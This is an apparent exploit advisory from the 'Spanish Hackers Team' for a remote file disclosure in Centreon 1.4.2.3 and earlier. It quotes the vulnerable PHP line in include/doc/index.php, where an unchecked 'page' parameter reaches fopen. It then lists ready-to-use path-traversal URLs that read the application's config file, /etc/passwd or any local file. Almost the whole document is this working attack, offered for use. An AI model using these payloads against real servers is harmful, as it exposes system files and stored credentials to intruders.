[+] Info: [~] Software: Centreon <= 1.4.2.3 [~] HomePage: http://www.centreon.com [~] Exploit: Remote File Disclosure [High] [~] Where: include/doc/index.php [~] Bug Found By: Jose Luis Góngora Fernández|JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Spanish Hackers Team [SHT] [+] Bug In include/doc/index.php: [~] line 33: $doc = fopen("../doc/".$oreon->user->get_lang()."/".$_GET["page"], "r"); [+] Exploit: [~] /include/doc/index.php?page=../../www/oreon.conf.php [~] /include/doc/index.php?page=../../../../../etc/passwd [~] /include/doc/index.php?page=[Local File]
